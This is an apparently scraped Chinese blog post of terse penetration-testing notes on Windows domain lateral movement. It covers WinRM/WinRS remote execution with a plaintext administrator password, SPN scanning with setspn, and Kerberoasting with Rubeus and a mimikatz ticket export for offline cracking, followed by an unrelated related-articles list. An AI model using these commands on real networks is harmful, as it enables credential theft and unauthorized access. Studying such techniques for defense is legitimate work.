当前位置: 首页 > news >正文

内网安全-横向移动Kerberos 攻击SPN 扫描WinRMWinRSRDP

news 2025/7/4 18:27:32

1.WinRM&WinRS

条件:

双方开启winrm winrs服务

2008版本以上默认开启,win 7默认关闭

检测使用cs内置端口扫描5985开放情况

进行连接

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami

2.内网-spn

shell setspn -T god.org -q */*

探测主机

rc4可以被逆向aes256不可

3.kerbercast攻击条件:

使用rc4进行加密类型票据,工具Rubeus检测或者看加密类型

1.扫描:

shell setspn -T god.org -q */*

2.使用工具检测

Rubeus kerbercast

3.使用手工进行判断请求

使用klist查看

使用mimkaz进行导出和查看

导出

kerberos::list /export

使用脚本进行破解

http://www.dtcms.com/a/81013.html

相关文章:

  • C++ std::bitset
  • 【MyDB】5-索引管理之4-单元测试
  • 详解string类+迭代器
  • 【万字总结】前端全方位性能优化指南(二)——AVIF/WebP格式转换、渐进式加载、WASM解码加速
  • 【存储中间件】Redis核心技术与实战(四):Redis高并发高可用(Redis集群介绍与搭建)
  • TDengine 元数据
  • 从零开始实现 C++ TinyWebServer 异步日志系统 Log类详解
  • MySQL数据库入门到大蛇尚硅谷宋红康老师笔记 高级篇 part10
  • LIMS系统在纸制品制造的应用 内检实验室LIMS系统提升纸制品质控
  • JavaScript 数组方法大全:从基础到高级
  • IO(Input/Output)
  • GStreamer —— 3.1、Qt+GStreamer制作多功能播放器,支持本地mp4文件、rtsp流、usb摄像头等(可跨平台,附源码)
  • 新增菜品-02.代码开发2
  • 【后端】【Djagno】【ORM】models.ManyToManyField 多对多字段类型全解
  • 【设计模式】策略模式
  • EasyExcel--导入和导出Excel的方法
  • 面向机器人领域 | AKM Delta-Sigma数字输出无磁芯电流传感器
  • turnjs图册翻书效果
  • 数据仓库是什么,跟数据集成有什么关系
  • Web3 时代数据保护的关键挑战与应对策略
  • PostgreSQL 触发器
  • 电机控制常见面试问题(十四)
  • gralloc1_perform具体在干什么
  • 从两指到三指:Robotiq机器人自适应夹持器技术解析
  • MySQL InnoDB 事务隔离级别和锁
  • git 命令回退版本
  • nodejs - 基础知识
  • Plant Simulation中怎么更改机器人3D模型
  • 精挑20题:MySQL 8.0高频面试题深度解析——掌握核心知识点、新特性和优化技巧
  • WPF 布局中的共性尺寸组(Shared Size Group)